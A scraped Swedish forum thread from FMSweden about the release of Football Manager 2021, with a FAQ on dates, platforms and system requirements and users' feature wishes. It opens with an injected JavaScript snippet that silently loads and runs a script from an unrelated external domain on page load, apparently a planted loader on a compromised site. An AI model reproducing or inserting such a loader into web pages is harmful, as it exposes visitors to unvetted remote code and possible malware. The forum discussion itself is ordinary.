;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Den stora tråden om FM21 – Football Manager 2021 – FMSweden Forum
Meny Stäng

Den stora tråden om...

Share:
Notifications
Clear all

[Klistrad] Den stora tråden om FM21

247 Inlägg
88 Users
182 Reactions
21.9 K Visningar
Patrick92
(@patrick92)
Eminent Member
Topic starter  

Så när ska det komma någon info/tråd/snack om FM21 här på FMsweden? Nu när releasedatum och så är ute.

Här följer mer info / Micke mod:

När släpps FM21? 

Den 24 november 2020.

När släpps betan/early access?

Cirka två veckor före releasedatumet. Något exakt datum är ännu ej bestämt.

Demot då?

Den kostnadsfria demoversionen släpps samtidigt som huvudspelet.

På vilka konsoler kommer spelet att finnas?

Som vanligt kommer FM21 att finnas tillgängligt på PC och Mac. Sports Interactive (SI) jobbar även på att spelet ska bli tillgängligt på Google Stadia, men vågar ej utlova något om det i dagsläget. Spelet kommer även för första gången på 13 år kunna gå att köpa på Xbox (så väl One som nya X/S). Det rör sig om en avskalad variant som liknar FM Touch mer än huvudspelet. Man kommer dock kunna flytta sina sparningar mellan Xbox och en PC med Windows 10. Releasedatumet är för närvarande ej mer specificerat än att det blir i december.

Hur ser det ut med FM21 Touch och FM21 Mobile?

FM21 Touch - som är en mer avskalad variant av FM - kommer gå att köpa via PC/Mac, alternativt få "gratis" vid köp av huvudspelet. Precis som tidigare går det även att spela via iOS och Android. Dessutom kommer det släppas till Nintendo Switch, där releasedatumet för närvarande ej är mer specificerat än att det blir i december. FM21 Mobile - som är en version med ännu färre funktioner och är ännu lättare att spela - kommer att finnas tillgängligt via både iOS (Apple) och Android. Releasedatum är detsamma som för huvudspelet. För mer information om skillnaderna kring spelvarianterna, läs HÄR.

Vilka är systemkraven för att kunna spela FM21 på en dator?

FMScout har gjort en bra lista med minimikraven HÄR. Bland de största skillnaderna jämfört med tidigare upplagor märks exempelvis att RAM-minnet måste vara minst 4gb istället för 2gb.

Hos vilka officiella återförsäljare kan man köpa spelet?

Direkt via FM:s hemsida (där man får 10 % rabatt och tillgång till betan om man beställer före releasedatumet). Andra alternativ är Steam och nykomlingen Epic Games.

Kommer man kunna köpa spelet via FMSweden för att på så vis stödja sidan?

Vi jobbar på att nå en lösning kring detta och återkommer med mer information om det blir aktuellt.

Var kan jag få mer information kring FM21?

HÄR finns den officiella sidan. Ett hett tips är även att följa FM på sociala medier som Facebook, Twitter, Instagram och Youtube där de kommer ut med viktig information. Naturligtvis kommer även vi på FMSweden att skriva om spelet.

Vilka nya funktioner kommer att finnas jämfört med FM20?

SI har än så länge inte gått ut med något besked kring detta utan hänvisar till vidare kommunikation tidigt i oktober. Tråden uppdateras därmed kontinuerligt på denna punkt.

Frågor? Funderingar? Åsikter? Tankar? Skriv här i tråden!

This topic was modified 4 år sedan by Patrick92

Citera
Argt Troll
(@argt-troll)
Reputable Member

Grymt, här har vi den!

SvaraCitera
Nilisse
(@nilisse)
Active Member

Jag frågade på twitter och det blir inte något samarbete där vi får ett rabattavtal på FM i år via FMSweden. Men det finns på andra håll där de har en billigare deal än om man köper direkt från steam. https://fm-base.co.uk/buy-fm21/

SvaraCitera
Patrick92
(@patrick92)
Eminent Member
Topic starter  

@nilisse

Det var lite synd men ja funkar bra med steam om man vill ha det lite billigare. 

SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin

Postad av: @nilisse

Jag frågade på twitter och det blir inte något samarbete där vi får ett rabattavtal på FM i år via FMSweden. Men det finns på andra håll där de har en billigare deal än om man köper direkt från steam. https://fm-base.co.uk/buy-fm21/

Vem frågade du?

SvaraCitera
Q
 Q
(@q)
Estimable Member

Vore nice med releasedatum i trådstarten så slipper jag googla.

VI HAR ALLTID DRÖMT OM ATT SPELA I BLÅRANDIGT - SPELA SOM I VÅRA DRÖMMAR!

SvaraCitera
Micke
(@micke)
Reputable Member Admin

Postad av: @ragnar

Vore nice med releasedatum i trådstarten så slipper jag googla.

24 november!

"I have never played for a draw in my life." - Sir Alex Ferguson

SvaraCitera
Micke
(@micke)
Reputable Member Admin

Jag har nu uppdaterat huvudinlägget med en liten FAQ. Eftersom SI ännu inte gått ut med nya funktioner etc. kan vi ju alltid påbörja lite diskussioner här. Vad vill ni helst se i FM21? Vad vill ni förändra, ta bort, lägga till osv. jämfört med FM20? Diskutera i smågrupper.

SvaraCitera
Peter Hecktor
(@peter-hecktor)
Ägare

Jag har kontaktat CDON för att försöka få till ett samarbete och ett billigare spel till våra användare på FMS. Inget svar på det hittills. 

SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin

Dessa är tankar och önskemål från min sida, inget är officiellt som sagt.

Nya attribut - Det har länge och på senare tid allt mer intensivt snackats om nya attribut och då speciellt Passningsattributet, vilket är förståeligt. Man vill ha en split på attributet i vilket uppdelningen blir något i stil med "Korta Pass" och "Långa Pass" och här tänker jag att man med en sådan split på ett ännu bättre sätt kan bygga sin taktik åt ett mer tiki taka-håll eller mer raka passningar som bryter upp försvar.

Spelmotorn - I takt med att såväl PES som FIFA varje år säger sig slipa ännu mer på grafiken så står vi med en "1900-frös ihjäl"-spelmotor där spelarna ser ut som något en tioåring varit med och tagit fram TROTS en förbättring. Jag tror och hoppas att denna punkten ständigt är med inför varje upplaga men bevisligen är den ju inte det.

Förbundskapten - Att vara förbundskapten innebär ungefär att du kommer få kramp i pekfingret eftersom du trycker på mellanslag konstant. Här vill jag se mer möjligheter i form av i synnerhet träning vilket på så sätt kan göra att truppen blir mer samspelt ju mer de blir uttagna och sedermera spelar ihop. Idag kan du ständigt ta ut 23 nya spelare inför varje samling och ändå prestera ungefär lika bra/dåligt. Men med en träningsdel till förbundskapteneriet så kan du på en helt ny nivå bygga ett landslag.

Ekonomi - Personligen tycker jag det är alldeles för lätt att bygga en stormakt rent ekonomiskt, i synnerhet i de mer penningstinna divisionerna/klubbarna. Ekvationen är på tok för lätt, det finns inga riktiga motlägg annat än att om du vill ha in en miljardspelare så säljer du ett par talanger and that's it. Det behövs något som dränerar pengar på något sätt utan att det går ut över blåbärsklubbar för där tycker jag det är bättre balanserat.

Din manager - Här är två saker jag vill ta upp. Det första är "jag vill göra något med mina intjänade pengar" och det andra är "jag vill ta över en riktig tränare, exempelvis Pep Guardiola". Angående det förstnämnda så har det länge varit på tal om att kunna betala sina egna tränarutbildningar men även köpa upp småklubbar och alternera med ett ägarskap utöver din managerkarriär. Gällande det andra så tycker jag egentligen att det ska vara en självklarhet då det ger ytterligare en dimension i spelet. Hur många försöker inte återskapa en riktig tränare och spela som honom?

Sportchef - Också en klassiker. Det heter naturligtvis Football MANAGER men samtidigt är också detta en dimension som kan öka nivån avsevärt. Tänk er dessutom ett onlinespel där en av er är sportchef och den andra är manager. Jag och Tobias Hysén har ett liknande projekt ihop där jag är hans huvudscout och han är manager, varför inte göra det mer officiellt än att behöva skicka över sparfilen till varandra tänker jag??

Junior- och reservlagstränare - Behöver jag säga mer? Att börja från noll som junior- eller reservlagstränare är också en intressant punkt, något som kan liknas med att börja från noll i ett blåbärslag fast du har någon ovanför dig som kan flytta upp dina bättre spelare eller annat, PRECIS SOM B-KLUBBARNA I SPANIEN. Ekvationen verkar ju finnas där men det är något som sätter stopp trots att vi i många år har önskat detta.

Damfotboll - En intressant punkt som av helt naturliga skäl blivit allt mer snack kring. Vi luftade även denna frågan i ett av poddavsnitten där jag berättade att jag är öppen för att SIGames ska implementera det på FM. Istället för att ha alternativet "Randomize" där helt nygenererade spelare ersätter de befintliga vid spelstart så kan detta vara ett alternativ. Vi har ju även fått höra en hel del historier genom åren där flera klubbar runtom världen använt sig av FM's databas som ett scoutingverktyg och detta kan också bli en eye-openerer inom damfotbollen med scouting och sponsorer.

raca14, Micke and vicke231 reacted
SvaraCitera
Peter Hecktor
(@peter-hecktor)
Ägare

Intressant Danne! Jag personligen har i flera år eftersökt att kunna ta över och vara en "riktig" manager, t.ex Mauricio Pochettino och då vara "han" fullt ut. Så t.ex om jag startar nytt spel och är honom så är jag klubblös (då han är det på riktigt) och sedan tar mig vidare därifrån.

SvaraCitera
Micke
(@micke)
Reputable Member Admin

Många bra punkter Danne! Du borde boka in ett möte med Miles ? 

Nej men seriöst så är ju landslagsdelen katastrof i nuläget, åtminstone på FM19 där jag lirat det. Vet ej om det förändrats något nämnvärt till FM20. Men när man spelar match i princip var tredje dag och aldrig får en möjlighet att vila sina spelare så blir det ju enorma problem med spelarnas kondition, vilket medför stor rotation. Det blir ju orealistiskt, inget landslag roterar så mycket under en turnering i verkligheten. Visst är de slitna förstås, men på FM presterar ju spelarna riktigt dåligt om de är nere på 70-80 % i kondition redan när matchen startar.

SvaraCitera
Andreas_N
(@andreas_n)
Eminent Member

Liten miss i FAQ —> FMT kommer precis som förut även finnas till tablets, spelar själv på iOS/iPad, men tror att det finns till Android också ?

Micke reacted
SvaraCitera
Micke
(@micke)
Reputable Member Admin

Postad av: @andreas_n

Liten miss i FAQ —> FMT kommer precis som förut även finnas till tablets, spelar själv på iOS/iPad, men tror att det finns till Android också ?

Tack för rättelse, missade att ta med det först. Åtgärdat nu.

Andreas_N reacted
SvaraCitera
Hammurabbit
(@hammurabbit)
Active Member

Personligen är jag lite inspirerad av Crusader Kings III som jag tycker visar hur mycket man kan göra med ett spel när man lägger till mer "flavour". I CK3 har man satsat stort på att göra alla karaktärer unika, både visuellt genom att karaktärena kan ha en uppsjö olika utseenden och kläder, men också i en mängd olika personlighetsattribut - som såklart påverkar hur de reagerar på olika saker. Dessutom förändras personen vid olika händelser (skador, sjukdomar, ålder).

Jag tror att FM har enorm potential här -> mer flavour hur spelare ser ut och beter sig på och utanför planen, gör personligheterna, styrkorna, svagheterna, traitsen mycket mer tydliga. Idag göms de undan och jag tror många spelare knappt vet att de finns.

Det är det jag hoppas på i FM21, att de jobbar på core upplevelsen matcherna och spelarna, och lägger till med flavour till dem. Det, och att balansera matchmotorn så defensiva + kontringstaktiker blir mer viable.

Micke and Daniel Nilsson reacted
SvaraCitera
Hammurabbit
(@hammurabbit)
Active Member

Det har postats en lite teaser på Twitter nu, en otroligt hetsig enminutsfilm som man kanske inte skall läsa in för mycket in, men ändå något att spekulera om.

Ser inte jättespännande ut imho. Känns som de försöker fixa lite features som idag är broken (presskonf, shouts från sidlinjen, konversationer med spelare) men som jag tycker är rätt perifera saker och egentligen mest försöker undvika. Ta ex presskonferenser. Såvida man inte gjort en AI som genererar frågor är det lite svårt att undvika att det blir repeterande av samma gamla frågor inför varje match. Ser hellre att man tagit bort grejer som inte blev bra, än att de försöker fixa. Men visst, jag har förhoppningsvis fel och presskonferenser förvandlas till ett spännande spel i sig själv.

Dock verkar det ha lagts till lite analysfeatures vilket jag ser fram emot. Just att analysera matcher, och fatta varför den slutade som den slutade är något som jag gärna vill bli bättre på och gärna ser utvecklas i spelet.

Även en del tillägg på transfer/scouting-sidan. Spännande såklart, men något som jag tycker fungerar väldigt bra redan.

Förhoppningsvis kommer det mer info snart. Jag hoppas på lite enkla vinster : "30 nya dribblingsanimationer", "fler typer av målchanser", "smartare motståndartränare" osv.

Micke reacted
SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

Nu längtar man röven till FM21! Jag har lirat FM16 fram till nu. Kommer vara helt lost i början ?

Micke reacted
SvaraCitera
(@brunosantos)
Active Member

Nån som har en uppfattning om det går o köra FM21 vettigt på min MacBook Air från tidigt 2015?

Minimikrav är 4gb och min har 8gb medan minimi för Processorn är Intel Core 2 Duo – 1.8 GHz eller högre och jag har 1,6 GHz Dual-Core Intel Core i5.

Idag spelar jag mest klassisk text under matcherna men brukar se Extented highlights (eller vad det nu heter) i viktigare matcher. Samt att jag vill kunna ha en databas runt 40-50000 spelare. Funkar bra i dagsläget (även om det blir lite surr i burken o den blir varm då o då men, men...) men då de höjt minimikraven från 2gb till 4gb så ville jag kolla vad ni tror. Är så kass på sånt här...;)

SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin

@brunosantos Jag tror det kommer fungera bra. Och om du är osäker och inte vill kasta pengarna i sjön så vänta tills releasedagen för då släpper dom även demot som går att spela gratis. Därefter kan du själv avgöra om det fortsatt fungerar bra med FM på din Macbook Air eller om du kanske måste investera i en ny för att kunna spela FM'21. Visserligen missar man beta-perioden som är två veckorna fram till release men det är som sagt om man vill vara helt säker utan att slösa några pengar.

Micke and BrunoSantos reacted
SvaraCitera
(@brunosantos)
Active Member

@trashbag Tack för svar, låter som en bra idé att testa demot. 🙂

SvaraCitera
Sida 1 / 13
Share: